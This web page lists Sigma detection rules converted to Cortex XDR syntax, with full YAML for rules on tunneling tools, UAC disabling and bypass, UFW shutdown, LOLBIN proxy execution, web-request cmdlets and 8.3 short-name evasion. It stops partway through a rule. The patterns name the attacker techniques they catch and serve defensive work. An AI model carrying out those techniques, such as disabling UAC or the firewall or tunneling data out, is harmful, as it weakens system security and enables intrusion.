Tool
EDR / XDR
Palo Alto Cortex XDR
559 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance4
Resource Development5
Initial Access7
Execution25
Persistence31
Privilege Escalation17
Stealth63
Defense Impairment16
Credential Access26
Discovery24
Lateral Movement10
Collection11
Command and Control18
Exfiltration7
Impact10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 559
medium
Moderate
High FP
Tunneling Tool Execution
Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
view Sigma YAML
title: Tunneling Tool Execution
id: c75309a3-59f8-4a8d-9c2c-4c927ad50555
status: test
description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
author: Daniil Yugoslavskiy, oscd.community
references:
- https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
date: 2019-10-24
modified: 2024-01-18
tags:
- attack.exfiltration
- attack.command-and-control
- attack.t1041
- attack.t1572
- attack.t1071.001
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\httptunnel.exe'
- '\plink.exe'
- '\socat.exe'
- '\stunnel.exe'
condition: selection
falsepositives:
- Legitimate administrators using one of these tools
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
UAC Bypass via Windows Firewall Snap-In Hijack
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
view Sigma YAML
title: UAC Bypass via Windows Firewall Snap-In Hijack
id: e52cb31c-10ed-4aea-bcb7-593c9f4a315b
status: test
description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
references:
- https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
tags:
- attack.privilege-escalation
- attack.t1548
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\mmc.exe'
ParentCommandLine|contains: 'WF.msc'
filter:
Image|endswith: '\WerFault.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
UAC Disabled
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
view Sigma YAML
title: UAC Disabled
id: 48437c39-9e5f-47fb-af95-3d663c3f2919
related:
- id: c5f6a85d-b647-40f7-bbad-c10b66bab038
type: similar
- id: 0d7ceeef-3539-4392-8953-3dc664912714
type: similar
status: stable
description: |
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
author: frack113
date: 2022-01-05
modified: 2024-05-10
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
UAC Notification Disabled
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
view Sigma YAML
title: UAC Notification Disabled
id: c5f6a85d-b647-40f7-bbad-c10b66bab038
related:
- id: 0d7ceeef-3539-4392-8953-3dc664912714
type: similar
- id: 48437c39-9e5f-47fb-af95-3d663c3f2919
type: similar
status: test
description: |
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
- https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2024-05-10
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Microsoft\Security Center\UACDisableNotify'
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
UAC Secure Desktop Prompt Disabled
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
view Sigma YAML
title: UAC Secure Desktop Prompt Disabled
id: 0d7ceeef-3539-4392-8953-3dc664912714
related:
- id: c5f6a85d-b647-40f7-bbad-c10b66bab038
type: similar
- id: 48437c39-9e5f-47fb-af95-3d663c3f2919
type: similar
status: test
description: |
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
author: frack113
date: 2024-05-10
tags:
- attack.privilege-escalation
- attack.t1548.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
UFW Disable Attempt
Detects attempts to disable the Uncomplicated Firewall (UFW) on Linux systems.
UFW is a popular firewall management tool that provides an easy-to-use interface for configuring firewall rules.
Disabling UFW can leave a system vulnerable to attacks, as it may allow unauthorized access to network services and resources.
view Sigma YAML
title: UFW Disable Attempt
id: 84c9e83c-599a-458a-a0cb-0ecce44e807a
status: test
description: |
Detects attempts to disable the Uncomplicated Firewall (UFW) on Linux systems.
UFW is a popular firewall management tool that provides an easy-to-use interface for configuring firewall rules.
Disabling UFW can leave a system vulnerable to attacks, as it may allow unauthorized access to network services and resources.
references:
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
- https://manpages.debian.org/unstable/ufw/ufw-framework.8.en.html
- https://www.cyberciti.biz/faq/linux-disable-firewall-command/
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-18
modified: 2026-05-04
tags:
- attack.defense-impairment
- attack.t1686
logsource:
product: linux
category: process_creation
detection:
selection_ufw_init:
Image|endswith: '/ufw-init'
CommandLine|contains:
- ' force-stop' # same as stop, except does not check if the firewall is already loaded
- ' stop' # unloads the firewall
- ' flush' # flushes the built-in chains, deletes all non-built-in chains and resets the policy to ACCEPT
selection_ufw_disable:
CommandLine|contains|all:
# Covers both ufw disable and systemctl disable ufw
# systemctl disable ufw -- prevents UFW starting at boot, but does not stop the currently running instance of UFW
# ufw disable -- stops the currently running instance of UFW and prevents it from starting at boot
- 'ufw '
- 'disable'
condition: 1 of selection_*
falsepositives:
- Legitimate actions by system administrators to disable UFW.
level: medium
Convert to SIEM query
medium
Moderate
High FP
Uncommon Child Process Of AddinUtil.EXE
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
view Sigma YAML
title: Uncommon Child Process Of AddinUtil.EXE
id: b5746143-59d6-4603-8d06-acbd60e166ee
status: test
description: |
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023-09-18
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\addinutil.exe'
filter_main_werfault:
Image|endswith:
- ':\Windows\System32\conhost.exe'
- ':\Windows\System32\werfault.exe'
- ':\Windows\SysWOW64\werfault.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Uncommon Child Process Of Appvlp.EXE
Detects uncommon child processes of Appvlp.EXE
Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
or to mark a file as a system file.
view Sigma YAML
title: Uncommon Child Process Of Appvlp.EXE
id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43
status: test
description: |
Detects uncommon child processes of Appvlp.EXE
Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
or to mark a file as a system file.
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/
author: Sreeman
date: 2020-03-13
modified: 2023-11-09
tags:
- attack.stealth
- attack.t1218
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\appvlp.exe'
# Note: Filters based on data from EchoTrail: https://www.echotrail.io/insights/search/appvlp.exe/
filter_main_generic:
Image|endswith:
- ':\Windows\SysWOW64\rundll32.exe'
- ':\Windows\System32\rundll32.exe'
filter_optional_office_msoasb:
Image|contains: ':\Program Files\Microsoft Office'
Image|endswith: '\msoasb.exe'
filter_optional_office_skype:
Image|contains|all:
- ':\Program Files\Microsoft Office'
- '\SkypeSrv\'
Image|endswith: '\SKYPESERVER.EXE'
filter_optional_office_msouc:
Image|contains: ':\Program Files\Microsoft Office'
Image|endswith: '\MSOUC.EXE'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Uncommon Child Process Of BgInfo.EXE
Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
view Sigma YAML
title: Uncommon Child Process Of BgInfo.EXE
id: aaf46cdc-934e-4284-b329-34aa701e3771
related:
- id: 811f459f-9231-45d4-959a-0266c6311987
type: similar
status: test
description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
date: 2019-10-26
modified: 2023-08-16
tags:
- attack.execution
- attack.stealth
- attack.t1059.005
- attack.t1218
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\bginfo.exe'
- '\bginfo64.exe'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Uncommon Child Process Of Defaultpack.EXE
Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
view Sigma YAML
title: Uncommon Child Process Of Defaultpack.EXE
id: b2309017-4235-44fe-b5af-b15363011957
status: test
description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/
- https://www.echotrail.io/insights/search/defaultpack.exe
author: frack113
date: 2022-12-31
modified: 2024-04-22
tags:
- attack.stealth
- attack.t1218
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\DefaultPack.exe'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Uncommon Child Process Spawned By Odbcconf.EXE
Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
view Sigma YAML
title: Uncommon Child Process Spawned By Odbcconf.EXE
id: 8e3c7994-131e-4ba5-b6ea-804d49113a26
status: test
description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
references:
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
- https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
- https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac
author: Harjot Singh @cyb3rjy0t
date: 2023-05-22
tags:
- attack.stealth
- attack.t1218.008
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\odbcconf.exe'
condition: selection
falsepositives:
- In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
- Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Uncommon Child Processes Of SndVol.exe
Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
view Sigma YAML
title: Uncommon Child Processes Of SndVol.exe
id: ba42babc-0666-4393-a4f7-ceaf5a69191e
status: test
description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)
references:
- https://twitter.com/Max_Mal_/status/1661322732456353792
author: X__Junior (Nextron Systems)
date: 2023-06-09
tags:
- attack.execution
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|endswith: '\SndVol.exe'
filter_main_rundll32:
Image|endswith: '\rundll32.exe'
CommandLine|contains: ' shell32.dll,Control_RunDLL '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Uncommon Link.EXE Parent Process
Detects an uncommon parent process of "LINK.EXE".
Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
view Sigma YAML
title: Uncommon Link.EXE Parent Process
id: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6
status: test
description: |
Detects an uncommon parent process of "LINK.EXE".
Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.
Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity.
This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location.
By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.
references:
- https://twitter.com/0gtweet/status/1560732860935729152
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-22
modified: 2024-06-27
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\link.exe'
CommandLine|contains: 'LINK /' # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc
# Add other filters for other legitimate locations
filter_main_visual_studio:
ParentImage|startswith:
- 'C:\Program Files\Microsoft Visual Studio\'
- 'C:\Program Files (x86)\Microsoft Visual Studio\'
ParentImage|contains:
- '\VC\bin\'
- '\VC\Tools\'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Uncommon Sigverif.EXE Child Process
Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
view Sigma YAML
title: Uncommon Sigverif.EXE Child Process
id: 7d4aaec2-08ed-4430-8b96-28420e030e04
status: test
description: |
Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
references:
- https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/
- https://twitter.com/0gtweet/status/1457676633809330184
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-19
modified: 2024-08-27
tags:
- attack.stealth
- attack.t1216
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\sigverif.exe'
filter_main_werfault:
Image:
- 'C:\Windows\System32\WerFault.exe'
- 'C:\Windows\SysWOW64\WerFault.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Unusual Parent Process For Cmd.EXE
Detects suspicious parent process for cmd.exe
view Sigma YAML
title: Unusual Parent Process For Cmd.EXE
id: 4b991083-3d0e-44ce-8fc4-b254025d8d4b
status: test
description: Detects suspicious parent process for cmd.exe
references:
- https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-21
modified: 2023-12-05
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\cmd.exe'
ParentImage|endswith:
- '\csrss.exe'
- '\ctfmon.exe'
- '\dllhost.exe'
- '\epad.exe'
- '\FlashPlayerUpdateService.exe'
- '\GoogleUpdate.exe'
- '\jucheck.exe'
- '\jusched.exe'
- '\LogonUI.exe'
- '\lsass.exe'
- '\regsvr32.exe'
- '\SearchIndexer.exe'
- '\SearchProtocolHost.exe'
- '\SIHClient.exe'
- '\sihost.exe'
- '\slui.exe'
- '\spoolsv.exe'
- '\sppsvc.exe'
- '\taskhostw.exe'
- '\unsecapp.exe'
- '\WerFault.exe'
- '\wermgr.exe'
- '\wlanext.exe'
- '\WUDFHost.exe'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Usage Of Web Request Commands And Cmdlets
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
view Sigma YAML
title: Usage Of Web Request Commands And Cmdlets
id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
related:
- id: 1139d2e2-84b1-4226-b445-354492eba8ba
type: similar
- id: f67dbfce-93bc-440d-86ad-a95ae8858c90
type: obsolete
- id: cd5c8085-4070-4e22-908d-a5b3342deb74
type: obsolete
- id: 6e897651-f157-4d8f-aaeb-df8151488385
type: obsolete
status: test
description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
references:
- https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
- https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
- https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
date: 2019-10-24
modified: 2025-10-20
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '[System.Net.WebRequest]::create'
- 'curl '
- 'Invoke-RestMethod'
- 'Invoke-WebRequest'
- ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
- 'iwr '
# - 'Net.WebClient' # There are various other rules that cover this, so it is commented out
- 'Resume-BitsTransfer'
- 'Start-BitsTransfer'
- 'wget '
- 'WinHttp.WinHttpRequest'
condition: selection
falsepositives:
- Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
level: medium
Convert to SIEM query
medium
Strong
High FP
Use NTFS Short Name in Command Line
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
view Sigma YAML
title: Use NTFS Short Name in Command Line
id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795
related:
- id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b
type: similar
status: test
description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
references:
- https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
- https://twitter.com/jonasLyk/status/1555914501802921984
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-05
modified: 2022-09-21
tags:
- attack.stealth
- attack.t1564.004
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '~1.exe'
- '~1.bat'
- '~1.msi'
- '~1.vbe'
- '~1.vbs'
- '~1.dll'
- '~1.ps1'
- '~1.js'
- '~1.hta'
- '~2.exe'
- '~2.bat'
- '~2.msi'
- '~2.vbe'
- '~2.vbs'
- '~2.dll'
- '~2.ps1'
- '~2.js'
- '~2.hta'
filter:
- ParentImage|endswith:
- '\WebEx\WebexHost.exe'
- '\thor\thor64.exe'
- CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE'
condition: selection and not filter
falsepositives:
- Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Use NTFS Short Name in Image
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
view Sigma YAML
title: Use NTFS Short Name in Image
id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b
related:
- id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795
type: similar
status: test
description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
references:
- https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
- https://twitter.com/jonasLyk/status/1555914501802921984
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-06
modified: 2023-07-20
tags:
- attack.stealth
- attack.t1564.004
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- '~1.bat'
- '~1.dll'
- '~1.exe'
- '~1.hta'
- '~1.js'
- '~1.msi'
- '~1.ps1'
- '~1.tmp'
- '~1.vbe'
- '~1.vbs'
- '~2.bat'
- '~2.dll'
- '~2.exe'
- '~2.hta'
- '~2.js'
- '~2.msi'
- '~2.ps1'
- '~2.tmp'
- '~2.vbe'
- '~2.vbs'
filter_main_generic_parent:
ParentImage: 'C:\Windows\explorer.exe'
filter_optional_webex:
ParentImage|endswith: '\WebEx\WebexHost.exe'
filter_optional_thor:
ParentImage|endswith: '\thor\thor64.exe'
filter_optional_winzip:
Image: 'C:\PROGRA~1\WinZip\WZPREL~1.EXE'
filter_optional_vcred:
Image|endswith: '\VCREDI~1.EXE'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Software Installers
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Use Of The SFTP.EXE Binary As A LOLBIN
Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
view Sigma YAML
title: Use Of The SFTP.EXE Binary As A LOLBIN
id: a85ffc3a-e8fd-4040-93bf-78aff284d801
status: test
description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
references:
- https://github.com/LOLBAS-Project/LOLBAS/pull/264
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-10
tags:
- attack.execution
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\sftp.exe' # The "sftp.exe" located in the OpenSSH directory has no OriginalFileName :(
CommandLine|contains:
# Since "-D" is a valid flag for other usage we assume the user is going to enter a path
# Either a full one like "C:\Windows\System32\calc.exe" or a relative one "..\..\..\Windows\System32\calc.exe"
# In my testing you can't execute direct binaries by their name via this method (if you found a way please update the rule)
- ' -D ..'
- ' -D C:\'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Use Short Name Path in Command Line
Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
When investigating, examine:
- Commands using short paths to access sensitive directories or files
- Web servers on Windows (especially Apache) where short filenames could bypass security controls
- Correlation with other suspicious behaviors
- baseline of short name usage in your environment and look for deviations
view Sigma YAML
title: Use Short Name Path in Command Line
id: 349d891d-fef0-4fe4-bc53-eee623a15969
related:
- id: a96970af-f126-420d-90e1-d37bf25e50e1
type: similar
status: test
description: |
Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
When investigating, examine:
- Commands using short paths to access sensitive directories or files
- Web servers on Windows (especially Apache) where short filenames could bypass security controls
- Correlation with other suspicious behaviors
- baseline of short name usage in your environment and look for deviations
references:
- https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/
- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)
- https://twitter.com/frack113/status/1555830623633375232
author: frack113, Nasreddine Bencherchali
date: 2022-08-07
modified: 2025-10-22
tags:
- attack.stealth
- attack.t1564.004
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '~1\'
- '~2\'
filter_main_system_process:
ParentImage:
- 'C:\Windows\System32\Dism.exe'
- 'C:\Windows\System32\cleanmgr.exe'
filter_main_winget:
- ParentImage|endswith: '\winget.exe'
- ParentImage|contains: '\AppData\Local\Temp\WinGet\'
filter_main_csc:
ParentImage|startswith: 'C:\Windows\Microsoft.NET\Framework64\v'
ParentImage|endswith: '\csc.exe'
filter_main_installers:
- Image|contains|all:
- '\AppData\'
- '\Temp\'
- CommandLine|contains: '\AppData\Local\Temp\' # sometimes installers spawn other installers from temp folder
filter_optional_dopus:
ParentImage: 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe'
filter_optional_aurora:
ParentImage|endswith:
- '\aurora-agent-64.exe'
- '\aurora-agent.exe'
filter_optional_thor:
ParentImage|endswith: '\thor\thor64.exe'
filter_optional_git:
CommandLine|contains:
- 'C:\Program Files\Git\post-install.bat'
- 'C:\Program Files\Git\cmd\scalar.exe'
filter_optional_webex:
- ParentImage|endswith: '\WebEx\webexhost.exe'
- CommandLine|contains: '\appdata\local\webex\webex64\meetings\wbxreport.exe'
filter_optional_veeam:
ParentImage|endswith: '\veeam.backup.shell.exe'
filter_optional_everything:
ParentImage|endswith: '\Everything\Everything.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Use of Pcalua For Execution
Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
view Sigma YAML
title: Use of Pcalua For Execution
id: 0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2
related:
- id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02
type: obsolete
status: test
description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Pcalua/
- https://pentestlab.blog/2020/07/06/indirect-command-execution/
author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2022-06-14
modified: 2023-01-04
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\pcalua.exe'
CommandLine|contains: ' -a' # No space after the flag because it accepts anything as long as there a "-a"
condition: selection
falsepositives:
- Legitimate use by a via a batch script or by an administrator.
level: medium
Convert to SIEM query
medium
Moderate
High FP
User Added To Admin Group Via Dscl
Detects attempts to create and add an account to the admin group via "dscl"
view Sigma YAML
title: User Added To Admin Group Via Dscl
id: b743623c-2776-40e0-87b1-682b975d0ca5
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "dscl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos
- https://ss64.com/osx/dscl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.initial-access
